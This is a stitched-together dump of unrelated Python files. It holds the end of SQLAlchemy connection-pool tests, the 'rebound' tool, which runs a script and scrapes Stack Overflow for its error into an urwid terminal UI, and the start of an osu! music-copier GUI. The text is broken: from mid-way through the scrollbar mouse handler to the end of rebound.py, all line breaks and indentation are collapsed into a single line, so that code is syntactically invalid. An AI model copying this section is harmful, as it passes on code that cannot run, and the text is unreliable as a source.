        assert not dbapi.connect().rollback.called
        assert not dbapi.connect().commit.called

        c1 = p.connect()
        c1.close()
        eq_(dbapi.connect().special_rollback.call_count, 0)
        eq_(dbapi.connect().special_commit.call_count, 1)

        assert not dbapi.connect().rollback.called
        assert dbapi.connect().commit.called


class SingletonThreadPoolTest(PoolTestBase):

    @testing.requires.threading_with_mock
    def test_cleanup(self):
        self._test_cleanup(False)

    @testing.requires.threading_with_mock
    def test_cleanup_no_gc(self):
        self._test_cleanup(True)

    def _test_cleanup(self, strong_refs):
        """test that the pool's connections are OK after cleanup() has
        been called."""

        dbapi = MockDBAPI()

        lock = threading.Lock()

        def creator():
            # the mock iterator isn't threadsafe...
            with lock:
                return dbapi.connect()

        p = pool.SingletonThreadPool(creator=creator, pool_size=3)

        if strong_refs:
            sr = set()

            def _conn():
                c = p.connect()
                sr.add(c.connection)
                return c
        else:
            def _conn():
                return p.connect()

        def checkout():
            for x in range(10):
                c = _conn()
                assert c
                c.cursor()
                c.close()
                time.sleep(.1)

        threads = []
        for i in range(10):
            th = threading.Thread(target=checkout)
            th.start()
            threads.append(th)
        for th in threads:
            th.join(join_timeout)
        # cleanup keeps at most pool_size connections alive.
        assert len(p._all_conns) == 3

        if strong_refs:
            still_opened = len([c for c in sr if not c.close.call_count])
            eq_(still_opened, 3)


class AssertionPoolTest(PoolTestBase):
    def test_connect_error(self):
        # AssertionPool allows exactly one checkout at a time.
        dbapi = MockDBAPI()
        p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
        c1 = p.connect()
        assert_raises(AssertionError, p.connect)

    def test_connect_multiple(self):
        dbapi = MockDBAPI()
        p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
        c1 = p.connect()
        c1.close()
        c2 = p.connect()
        c2.close()

        c3 = p.connect()
        assert_raises(AssertionError, p.connect)


class NullPoolTest(PoolTestBase):
    def test_reconnect(self):
        dbapi = MockDBAPI()
        p = pool.NullPool(creator=lambda: dbapi.connect('foo.db'))
        c1 = p.connect()

        c1.close()
        c1 = None

        c1 = p.connect()
        c1.invalidate()
        c1 = None

        c1 = p.connect()
        dbapi.connect.assert_has_calls([
            call('foo.db'),
            call('foo.db')],
            any_order=True)


class StaticPoolTest(PoolTestBase):
    def test_recreate(self):
        # recreate() must reuse the same creator callable.
        dbapi = MockDBAPI()
        creator = lambda: dbapi.connect('foo.db')
        p = pool.StaticPool(creator)
        p2 = p.recreate()
        assert p._creator is p2._creator
# ---------------------------------------------------------------------------
# rebound.py
# ---------------------------------------------------------------------------
##########
## GLOBALS
##########


import urwid
import re
import sys
import os
from bs4 import BeautifulSoup
import requests
from queue import Queue
from subprocess import PIPE, Popen
from threading import Thread
import webbrowser
import time
from urwid.widget import (BOX, FLOW, FIXED)
import random

# Base URL for all Stack Overflow requests.
SO_URL = "https://stackoverflow.com"

# ASCII color codes
GREEN = '\033[92m'
GRAY = '\033[90m'
CYAN = '\033[36m'
RED = '\033[31m'
YELLOW = '\033[33m'
END = '\033[0m'
UNDERLINE = '\033[4m'
BOLD = '\033[1m'

# Scroll actions
SCROLL_LINE_UP = "line up"
SCROLL_LINE_DOWN = "line down"
SCROLL_PAGE_UP = "page up"
SCROLL_PAGE_DOWN = "page down"
SCROLL_TO_TOP = "to top"
SCROLL_TO_END = "to end"

# Scrollbar positions
SCROLLBAR_LEFT = "left"
SCROLLBAR_RIGHT = "right"

# Pool of user-agent strings; one is chosen at random per request (see souper).
USER_AGENTS = [
    "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
    "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
    "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Firefox/59",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
    'Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
    'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)',
    'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
    'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)',
    'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
]


##################
## FILE ATTRIBUTES
##################


def get_language(file_path):
    """Returns the language a file is written in."""
    if file_path.endswith(".py"):
        return "python3"
    elif file_path.endswith(".js"):
        return "node"
    elif file_path.endswith(".go"):
        return "go run"
    elif file_path.endswith(".rb"):
        return "ruby"
    elif file_path.endswith(".java"):
        return 'javac'  # Compile Java Source File
    elif file_path.endswith(".class"):
        return 'java'  # Run Java Class File
    else:
        return ''  # Unknown language


def get_error_message(error, language):
    """Filters the stack trace from stderr and returns only the error message.

    Returns None when there is no error or the error is not a compiler/runtime
    diagnostic worth searching for.
    """
    if error == '':
        return None
    elif language == "python3":
        if any(e in error for e in ["KeyboardInterrupt", "SystemExit", "GeneratorExit"]):  # Non-compiler errors
            return None
        else:
            # Last non-empty line of a CPython traceback holds the message.
            return error.split('\n')[-2].strip()
    elif language == "node":
        # NOTE(review): assumes a fixed stderr layout (message on line 5) —
        # fragile across Node versions; verify.
        return error.split('\n')[4][1:]
    elif language == "go run":
        return error.split('\n')[1].split(": ", 1)[1][1:]
    elif language == "ruby":
        error_message = error.split('\n')[0]
        return error_message[error_message.rfind(": ") + 2:]
    elif language == "javac":
        m = re.search(r'.*error:(.*)', error.split('\n')[0])
        return m.group(1) if m else None
    elif language == "java":
        for line in error.split('\n'):  # Multiple error formats
            m = re.search(r'.*(Exception|Error):(.*)', line)
            if m and m.group(2):
                return m.group(2)
            m = re.search(r'Exception in thread ".*" (.*)', line)
            if m and m.group(1):
                return m.group(1)
        return None


#################
## FILE EXECUTION
#################


## Helper Functions ##


def read(pipe, funcs):
    """Reads and pushes piped output to a shared queue and appropriate lists."""
    for line in iter(pipe.readline, b''):
        for func in funcs:
            func(line.decode("utf-8"))
    pipe.close()


def write(get):
    """Pulls output from shared queue and prints to terminal."""
    for line in iter(get, None):
        sys.stdout.write(line)


## Main ##


def execute(command):
    """Executes a given command and clones stdout/err to both variables and
    the terminal (in real-time).

    Returns an (output, errors) tuple of joined strings, or (None, None)
    when the target file doesn't exist.
    """
    process = Popen(
        command,
        cwd=None,
        shell=False,
        close_fds=True,
        stdout=PIPE,
        stderr=PIPE,
        bufsize=1
    )
    output, errors = [], []
    pipe_queue = Queue()  # Wowee, thanks CS 225

    # Threads for reading stdout and stderr pipes and pushing to a shared queue
    stdout_thread = Thread(target=read, args=(process.stdout, [pipe_queue.put, output.append]))
    stderr_thread = Thread(target=read, args=(process.stderr, [pipe_queue.put, errors.append]))

    writer_thread = Thread(target=write, args=(pipe_queue.get,))  # Thread for printing items in the queue

    # Spawns each thread
    for thread in (stdout_thread, stderr_thread, writer_thread):
        thread.daemon = True
        thread.start()

    process.wait()

    for thread in (stdout_thread, stderr_thread):
        thread.join()

    # Sentinel unblocks the writer thread's iter(get, None) loop.
    pipe_queue.put(None)

    output = ' '.join(output)
    errors = ' '.join(errors)

    if "java" != command[0] and not os.path.isfile(command[1]):  # File doesn't exist, for java, command[1] is a class name instead of a file
        return (None, None)
    else:
        return (output, errors)


###############
## WEB SCRAPING
###############


## Helper Functions ##


def stylize_code(soup):
    """Identifies and stylizes code in a question or answer."""
    # TODO: Handle blockquotes and markdown
    stylized_text = []
    code_blocks = [block.get_text() for block in soup.find_all("code")]
    blockquotes = [block.get_text() for block in soup.find_all("blockquote")]
    newline = False

    for child in soup.recursiveChildGenerator():
        name = getattr(child, "name", None)

        if name is None:  # Leaf (terminal) node
            if child in code_blocks:
                if newline:  # Code block
                    #if code_blocks.index(child) == len(code_blocks) - 1: # Last code block
                        #child = child[:-1]

                    stylized_text.append(("code", u"\n%s" % str(child)))
                    newline = False
                else:  # In-line code
                    stylized_text.append(("code", u"%s" % str(child)))
            else:  # Plaintext
                newline = child.endswith('\n')
                stylized_text.append(u"%s" % str(child))

    # NOTE(review): indexing [-2] raises IndexError when fewer than two
    # fragments were collected — confirm inputs always yield >= 2 nodes.
    if type(stylized_text[-2]) == tuple:  # Remove newline from questions/answers that end with a code block
        if stylized_text[-2][1].endswith('\n'):
            stylized_text[-2] = ("code", stylized_text[-2][1][:-1])

    return urwid.Text(stylized_text)


def get_search_results(soup):
    """Returns a list of dictionaries containing each search result."""
    search_results = []

    for result in soup.find_all("div", class_="question-summary search-result"):
        title_container = result.find_all("div", class_="result-link")[0].find_all("span")[0].find_all("a")[0]

        if result.find_all("div", class_="status answered") != []:  # Has answers
            answer_count = int(result.find_all("div", class_="status answered")[0].find_all("strong")[0].text)
        elif result.find_all("div", class_="status answered-accepted") != []:  # Has an accepted answer (closed)
            answer_count = int(result.find_all("div", class_="status answered-accepted")[0].find_all("strong")[0].text)
        else:  # No answers
            answer_count = 0

        search_results.append({
            "Title": title_container["title"],
            #"Body": result.find_all("div", class_="excerpt")[0].text,
            #"Votes": int(result.find_all("span", class_="vote-count-post ")[0].find_all("strong")[0].text),
            "Answers": answer_count,
            "URL": SO_URL + title_container["href"]
        })

    return search_results


def souper(url):
    """Turns a given URL into a BeautifulSoup object.

    Exits the process on network failure; returns None when Stack Overflow
    serves a captcha page instead of results.
    """
    try:
        html = requests.get(url, headers={"User-Agent": random.choice(USER_AGENTS)})
    except requests.exceptions.RequestException:
        sys.stdout.write("\n%s%s%s" % (RED, "Rebound was unable to fetch Stack Overflow results. "
                                            "Please check that you are connected to the internet.\n", END))
        sys.exit(1)

    # NOTE(review): pattern should be a raw string (r"\.com/nocaptcha") —
    # works today because \. is not a recognized escape, but flag it.
    if re.search("\.com/nocaptcha", html.url):  # URL is a captcha page
        return None
    else:
        return BeautifulSoup(html.text, "html.parser")


## Main ##


def search_stackoverflow(query):
    """Wrapper function for get_search_results.

    Returns (results, captcha_flag); results is None when blocked.
    """
    soup = souper(SO_URL + "/search?pagesize=50&q=%s" % query.replace(' ', '+'))
    # TODO: Randomize the user agent

    # NOTE(review): prefer `soup is None` over `soup == None`.
    if soup == None:
        return (None, True)
    else:
        return (get_search_results(soup), False)


def get_question_and_answers(url):
    """Returns details about a given question and list of its answers."""
    soup = souper(url)

    if soup == None:  # Captcha page
        return "Sorry, Stack Overflow blocked our request. Try again in a couple seconds.", "", "", ""
    else:
        question_title = soup.find_all('a', class_="question-hyperlink")[0].get_text()
        question_stats = soup.find_all("span", class_="vote-count-post")[0].get_text()  # Vote count

        try:
            question_stats = question_stats + " Votes | " + '|'.join((((soup.find_all("div",
                class_="module question-stats")[0].get_text()).replace('\n', ' ')).replace("     ",
                " | ")).split('|')[:2])  # Vote count, submission date, view count
        except IndexError:
            question_stats = "Could not load statistics."

        question_desc = stylize_code(soup.find_all("div", class_="post-text")[0])  # TODO: Handle duplicates
        question_stats = ' '.join(question_stats.split())

        answers = [stylize_code(answer) for answer in soup.find_all("div", class_="post-text")][1:]
        if len(answers) == 0:
            answers.append(urwid.Text(("no answers", u"\nNo answers for this question.")))

        return question_title, question_desc, question_stats, answers


############
## INTERFACE
############


## Helper Classes ##


class Scrollable(urwid.WidgetDecoration):
    # TODO: Fix scrolling behavior (works with up/down keys, not with cursor)

    def sizing(self):
        # Always presents itself as a box widget, regardless of the wrapped
        # widget's own sizing.
        return frozenset([BOX,])

    def selectable(self):
        return True

    def __init__(self, widget):
        """Box widget (wrapper) that makes a fixed or flow widget vertically scrollable."""
        self._trim_top = 0                  # rows trimmed off the top (scroll offset)
        self._scroll_action = None          # pending action set by keypress()
        self._forward_keypress = None       # whether keys go to the wrapped widget
        self._old_cursor_coords = None      # cursor position before last keypress
        self._rows_max_cached = 0
        self._rows_max_displayable = 0
        self.__super.__init__(widget)

    def render(self, size, focus=False):
        maxcol, maxrow = size

        # Render complete original widget
        ow = self._original_widget
        ow_size = self._get_original_widget_size(size)
        canv = urwid.CompositeCanvas(ow.render(ow_size, focus))
        canv_cols, canv_rows = canv.cols(), canv.rows()

        if canv_cols <= maxcol:
            pad_width = maxcol - canv_cols
            if pad_width > 0:  # Canvas is narrower than available horizontal space
                canv.pad_trim_left_right(0, pad_width)

        if canv_rows <= maxrow:
            fill_height = maxrow - canv_rows
            if fill_height > 0:  # Canvas is lower than available vertical space
                canv.pad_trim_top_bottom(0, fill_height)

        self._rows_max_displayable = maxrow

        if canv_cols <= maxcol and canv_rows <= maxrow:  # Canvas is small enough to fit without trimming
            return canv

        self._adjust_trim_top(canv, size)  # Trim canvas if necessary

        trim_top = self._trim_top
        trim_end = canv_rows - maxrow - trim_top
        trim_right = canv_cols - maxcol

        if trim_top > 0:
            canv.trim(trim_top)

        if trim_end > 0:
            canv.trim_end(trim_end)

        if trim_right > 0:
            canv.pad_trim_left_right(0, -trim_right)

        # Disable cursor display if cursor is outside of visible canvas parts
        if canv.cursor is not None:
            curscol, cursrow = canv.cursor
            if cursrow >= maxrow or cursrow < 0:
                canv.cursor = None

        # Let keypress() know if original_widget should get keys
        self._forward_keypress = bool(canv.cursor)

        return canv

    def keypress(self, size, key):
        # Give the wrapped widget first shot at the key when it has a cursor.
        if self._forward_keypress:
            ow = self._original_widget
            ow_size = self._get_original_widget_size(size)

            # Remember previous cursor position if possible
            if hasattr(ow, "get_cursor_coords"):
                self._old_cursor_coords = ow.get_cursor_coords(ow_size)

            key = ow.keypress(ow_size, key)
            if key is None:
                return None

        # Handle up/down, page up/down, etc
        command_map = self._command_map
        if command_map[key] == urwid.CURSOR_UP:
            self._scroll_action = SCROLL_LINE_UP
        elif command_map[key] == urwid.CURSOR_DOWN:
            self._scroll_action = SCROLL_LINE_DOWN
        elif command_map[key] == urwid.CURSOR_PAGE_UP:
            self._scroll_action = SCROLL_PAGE_UP
        elif command_map[key] == urwid.CURSOR_PAGE_DOWN:
            self._scroll_action = SCROLL_PAGE_DOWN
        elif command_map[key] == urwid.CURSOR_MAX_LEFT:  # "home"
            self._scroll_action = SCROLL_TO_TOP
        elif command_map[key] == urwid.CURSOR_MAX_RIGHT:  # "end"
            self._scroll_action = SCROLL_TO_END
        else:
            return key

        self._invalidate()

    def mouse_event(self, size, event, button, col, row, focus):
        ow = self._original_widget

        if hasattr(ow, "mouse_event"):
            ow_size = self._get_original_widget_size(size)
            row += self._trim_top  # Translate screen row to canvas row
            return ow.mouse_event(ow_size, event, button, col, row, focus)
        else:
            return False

    def _adjust_trim_top(self, canv, size):
        """Adjust self._trim_top according to self._scroll_action"""
        action = self._scroll_action
        self._scroll_action = None

        maxcol, maxrow = size
        trim_top = self._trim_top
        canv_rows = canv.rows()

        if trim_top < 0:  # Negative trim_top values use bottom of canvas as reference
            trim_top = canv_rows - maxrow + trim_top + 1

        if canv_rows <= maxrow:
            self._trim_top = 0  # Reset scroll position
            return

        def ensure_bounds(new_trim_top):
            # Clamp so the viewport never scrolls past either end.
            return max(0, min(canv_rows - maxrow, new_trim_top))

        if action == SCROLL_LINE_UP:
            self._trim_top = ensure_bounds(trim_top - 1)
        elif action == SCROLL_LINE_DOWN:
            self._trim_top = ensure_bounds(trim_top + 1)
        elif action == SCROLL_PAGE_UP:
            self._trim_top = ensure_bounds(trim_top - maxrow+1)
        elif action == SCROLL_PAGE_DOWN:
            self._trim_top = ensure_bounds(trim_top + maxrow-1)
        elif action == SCROLL_TO_TOP:
            self._trim_top = 0
        elif action == SCROLL_TO_END:
            self._trim_top = canv_rows - maxrow
        else:
            self._trim_top = ensure_bounds(trim_top)

        # If the cursor moved, keep it within the visible window.
        if self._old_cursor_coords is not None and self._old_cursor_coords != canv.cursor:
            self._old_cursor_coords = None
            curscol, cursrow = canv.cursor
            if cursrow < self._trim_top:
                self._trim_top = cursrow
            elif cursrow >= self._trim_top + maxrow:
                self._trim_top = max(0, cursrow - maxrow + 1)

    def _get_original_widget_size(self, size):
        # FIXED widgets take no size; FLOW widgets take (maxcol,).
        ow = self._original_widget
        sizing = ow.sizing()
        if FIXED in sizing:
            return ()
        elif FLOW in sizing:
            return (size[0],)

    def get_scrollpos(self, size=None, focus=False):
        return self._trim_top

    def set_scrollpos(self, position):
        self._trim_top = int(position)
        self._invalidate()

    def rows_max(self, size=None, focus=False):
        # Recompute total row count when a size is given; otherwise serve
        # the cached value from the last computation.
        if size is not None:
            ow = self._original_widget
            ow_size = self._get_original_widget_size(size)
            sizing = ow.sizing()
            if FIXED in sizing:
                self._rows_max_cached = ow.pack(ow_size, focus)[1]
            elif FLOW in sizing:
                self._rows_max_cached = ow.rows(ow_size, focus)
            else:
                raise RuntimeError("Not a flow/box widget: %r" % self._original_widget)
        return self._rows_max_cached

    @property
    def scroll_ratio(self):
        # NOTE(review): divides by _rows_max_displayable, which is 0 until
        # render() has run at least once — verify callers render first.
        return self._rows_max_cached / self._rows_max_displayable


class ScrollBar(urwid.WidgetDecoration):
    # TODO: Change scrollbar size and color(?)

    def sizing(self):
        return frozenset((BOX,))

    def selectable(self):
        return True

    def __init__(self, widget, thumb_char=u'\u2588', trough_char=' ',
                 side=SCROLLBAR_RIGHT, width=1):
        """Box widget that adds a scrollbar to `widget`."""
        self.__super.__init__(widget)
        self._thumb_char = thumb_char
        self._trough_char = trough_char
        self.scrollbar_side = side
        self.scrollbar_width = max(1, width)
        self._original_widget_size = (0, 0)
        self._dragging = False

    def render(self, size, focus=False):
        maxcol, maxrow = size

        ow = self._original_widget
        ow_base = self.scrolling_base_widget
        ow_rows_max = ow_base.rows_max(size, focus)

        if ow_rows_max <= maxrow:  # Canvas fits without scrolling - no scrollbar needed
            self._original_widget_size = size
            return ow.render(size, focus)

        sb_width = self._scrollbar_width
        self._original_widget_size = ow_size = (maxcol-sb_width, maxrow)

        ow_canv = ow.render(ow_size, focus)

        pos = ow_base.get_scrollpos(ow_size, focus)
        posmax = ow_rows_max - maxrow

        # Thumb shrinks/grows according to the ratio of
        # <number of visible lines> / <number of total lines>
        thumb_weight = min(1, maxrow / max(1, ow_rows_max))
        thumb_height = max(1, round(thumb_weight * maxrow))

        # Thumb may only touch top/bottom if the first/last row is visible
        top_weight = float(pos) / max(1, posmax)
        top_height = int((maxrow-thumb_height) * top_weight)
        if top_height == 0 and top_weight > 0:
            top_height = 1

        # Bottom part is remaining space
        bottom_height = maxrow - thumb_height - top_height
        assert thumb_height + top_height + bottom_height == maxrow

        # Create scrollbar canvas
        top = urwid.SolidCanvas(self._trough_char, sb_width, top_height)
        thumb = urwid.SolidCanvas(self._thumb_char, sb_width, thumb_height)
        bottom = urwid.SolidCanvas(self._trough_char, sb_width, bottom_height)
        sb_canv = urwid.CanvasCombine([
            (top, None, False),
            (thumb, None, False),
            (bottom, None, False),
        ])

        combinelist = [(ow_canv, None, True, ow_size[0]),
                       (sb_canv, None, False, sb_width)]

        if self._scrollbar_side != SCROLLBAR_LEFT:
            return urwid.CanvasJoin(combinelist)
        else:
            return urwid.CanvasJoin(reversed(combinelist))

    @property
    def scrollbar_width(self):
        return max(1, self._scrollbar_width)

    @scrollbar_width.setter
    def scrollbar_width(self, width):
        self._scrollbar_width = max(1, int(width))
        self._invalidate()

    @property
    def scrollbar_side(self):
        return self._scrollbar_side

    @scrollbar_side.setter
    def scrollbar_side(self, side):
        if side not in (SCROLLBAR_LEFT, SCROLLBAR_RIGHT):
            raise ValueError("scrollbar_side must be 'left' or 'right', not %r" % side)
        self._scrollbar_side = side
        self._invalidate()

    @property
    def scrolling_base_widget(self):
        """Nearest `base_widget` that is compatible with the scrolling API."""
        def orig_iter(w):
            # Walk down the decoration chain, yielding each wrapped widget.
            while hasattr(w, "original_widget"):
                w = w.original_widget
                yield w
            yield w

        def is_scrolling_widget(w):
            return hasattr(w, "get_scrollpos") and hasattr(w, "rows_max")

        for w in orig_iter(self):
            if is_scrolling_widget(w):
                return w

    @property
    def scrollbar_column(self):
        # Screen column occupied by the scrollbar.
        if self.scrollbar_side == SCROLLBAR_LEFT:
            return 0
        if self.scrollbar_side == SCROLLBAR_RIGHT:
            return self._original_widget_size[0]

    def keypress(self, size, key):
        return self._original_widget.keypress(self._original_widget_size, key)

    def mouse_event(self, size, event, button, col, row, focus):
        # NOTE(review): this method continues past the end of this chunk.
        ow = self._original_widget
        ow_size = self._original_widget_size
        handled = False
        if hasattr(ow, "mouse_event"):
            handled = ow.mouse_event(ow_size, event, button, col, row, focus)

        if not handled and hasattr(ow, "set_scrollpos"):
            if button == 4:  # Scroll wheel up
                pos = ow.get_scrollpos(ow_size)
                if pos > 0:
                    ow.set_scrollpos(pos - 1)
                    return True
            elif button == 5:  # Scroll wheel down
                pos = ow.get_scrollpos(ow_size)
                ow.set_scrollpos(pos + 1)
return True elif col == self.scrollbar_column: ow.set_scrollpos(int(row*ow.scroll_ratio)) if event == "mouse press": self._dragging = True elif event == "mouse release": self._dragging = False elif self._dragging: ow.set_scrollpos(int(row*ow.scroll_ratio)) if event == "mouse release": self._dragging = False return False class SelectableText(urwid.Text): def selectable(self): return True def keypress(self, size, key): return key ## Helper Functions ## def interleave(a, b): result = [] while a and b: result.append(a.pop(0)) result.append(b.pop(0)) result.extend(a) result.extend(b) return result ## Main ## class App(object): def __init__(self, search_results): self.search_results, self.viewing_answers = search_results, False self.palette = [ ("title", "light cyan,bold", "default", "standout"), ("stats", "light green", "default", "standout"), ("menu", "black", "light cyan", "standout"), ("reveal focus", "black", "light cyan", "standout"), ("no answers", "light red", "default", "standout"), ("code", "brown", "default", "standout") ] self.menu = urwid.Text([ u'\n', ("menu", u" ENTER "), ("light gray", u" View answers "), ("menu", u" B "), ("light gray", u" Open browser "), ("menu", u" Q "), ("light gray", u" Quit"), ]) results = list(map(lambda result: urwid.AttrMap(SelectableText(self._stylize_title(result)), None, "reveal focus"), self.search_results)) # TODO: Add a wrap='clip' attribute content = urwid.SimpleListWalker(results) self.content_container = urwid.ListBox(content) layout = urwid.Frame(body=self.content_container, footer=self.menu) self.main_loop = urwid.MainLoop(layout, self.palette, unhandled_input=self._handle_input) self.original_widget = self.main_loop.widget self.main_loop.run() def _handle_input(self, input): if input == "enter": # View answers url = self._get_selected_link() if url != None: self.viewing_answers = True question_title, question_desc, question_stats, answers = get_question_and_answers(url) pile = 
urwid.Pile(self._stylize_question(question_title, question_desc, question_stats) + [urwid.Divider('*')] + interleave(answers, [urwid.Divider('-')] * (len(answers) - 1))) padding = ScrollBar(Scrollable(urwid.Padding(pile, left=2, right=2))) #filler = urwid.Filler(padding, valign="top") linebox = urwid.LineBox(padding) menu = urwid.Text([ u'\n', ("menu", u" ESC "), ("light gray", u" Go back "), ("menu", u" B "), ("light gray", u" Open browser "), ("menu", u" Q "), ("light gray", u" Quit"), ]) self.main_loop.widget = urwid.Frame(body=urwid.Overlay(linebox, self.content_container, "center", ("relative", 60), "middle", 23), footer=menu) elif input in ('b', 'B'): # Open link url = self._get_selected_link() if url != None: webbrowser.open(url) elif input == "esc": # Close window if self.viewing_answers: self.main_loop.widget = self.original_widget self.viewing_answers = False else: raise urwid.ExitMainLoop() elif input in ('q', 'Q'): # Quit raise urwid.ExitMainLoop() def _get_selected_link(self): focus_widget, idx = self.content_container.get_focus() # Gets selected item title = focus_widget.base_widget.text for result in self.search_results: if title == self._stylize_title(result): # Found selected title's search_result dict return result["URL"] def _stylize_title(self, search_result): if search_result["Answers"] == 1: return "%s (1 Answer)" % search_result["Title"] else: return "%s (%s Answers)" % (search_result["Title"], search_result["Answers"]) def _stylize_question(self, title, desc, stats): new_title = urwid.Text(("title", u"%s" % title)) new_stats = urwid.Text(("stats", u"%s\n" % stats)) return [new_title, desc, new_stats] ####### ## MAIN ####### ## Helper Functions ## def confirm(question): """Prompts a given question and handles user input.""" valid = {"yes": True, 'y': True, "ye": True, "no": False, 'n': False, '': True} prompt = " [Y/n] " while True: sys.stdout.write(BOLD + CYAN + question + prompt + END) choice = input().lower() if choice in valid: return 
valid[choice] sys.stdout.write("Please respond with 'yes' or 'no' (or 'y' or 'n').\n") def print_help(): """Prints usage instructions.""" sys.stdout.write("%sRebound, V1.1.9a1 - Made by @shobrook%s\n" % (BOLD, END)) sys.stdout.write("Command-line tool that automatically searches Stack Overflow and displays results in your terminal when you get a compiler error.") sys.stdout.write("\n\n%sUsage:%s $ rebound %s[file_name]%s\n" % (UNDERLINE, END, YELLOW, END)) sys.stdout.write("\n$ python3 %stest.py%s => $ rebound %stest.py%s" % (YELLOW, END, YELLOW, END)) sys.stdout.write("\n$ node %stest.js%s => $ rebound %stest.js%s\n" % (YELLOW, END, YELLOW, END)) sys.stdout.write("\nIf you just want to query Stack Overflow, use the -q parameter: $ rebound -q %sWhat is an array comprehension?%s\n\n" % (YELLOW, END)) ## Main ## def main(): if len(sys.argv) == 1 or sys.argv[1].lower() == "-h" or sys.argv[1].lower() == "--help": print_help() elif sys.argv[1].lower() == "-q" or sys.argv[1].lower() == "--query": query = ' '.join(sys.argv[2:]) search_results, captcha = search_stackoverflow(query) if search_results != []: if captcha: sys.stdout.write("\n%s%s%s" % (RED, "Sorry, Stack Overflow blocked our request. 
Try again in a minute.\n", END)) return else: App(search_results) # Opens interface else: sys.stdout.write("\n%s%s%s" % (RED, "No Stack Overflow results found.\n", END)) else: language = get_language(sys.argv[1].lower()) # Gets the language name if language == '': # Unknown language sys.stdout.write("\n%s%s%s" % (RED, "Sorry, Rebound doesn't support this file type.\n", END)) return file_path = sys.argv[1:] if language == 'java': file_path = [f.replace('.class', '') for f in file_path] output, error = execute([language] + file_path) # Compiles the file and pipes stdout if (output, error) == (None, None): # Invalid file return error_msg = get_error_message(error, language) # Prepares error message for search if error_msg != None: language = 'java' if language == 'javac' else language # Fix language compiler command query = "%s %s" % (language, error_msg) search_results, captcha = search_stackoverflow(query) if search_results != []: if captcha: sys.stdout.write("\n%s%s%s" % (RED, "Sorry, Stack Overflow blocked our request. Try again in a minute.\n", END)) return elif confirm("\nDisplay Stack Overflow results?"): App(search_results) # Opens interface else: sys.stdout.write("\n%s%s%s" % (RED, "No Stack Overflow results found.\n", END)) else: sys.stdout.write("\n%s%s%s" % (CYAN, "No error detected :)\n", END)) return if __name__ == "__main__": main()
# ===== file: osu_music_copier.py =====
import ctypes
import platform
import sys
import tkinter
import webbrowser
from queue import Queue
from threading import Thread
from tkinter import Text, filedialog, ttk

from copier_process import copy


# Open the osu! Music Copier repository in the default browser
def openRepository(event):
    webbrowser.open("https://github.com/ReNeeter/osu-Music-Copier")


# Show the "About" dialog
def showAbout():
    aboutDialog = tkinter.Toplevel(mainRoot)
    aboutDialog.grab_set()
    aboutDialog.resizable(False, False)
    aboutDialog.title("About")
    aboutFrame = ttk.Frame(aboutDialog)
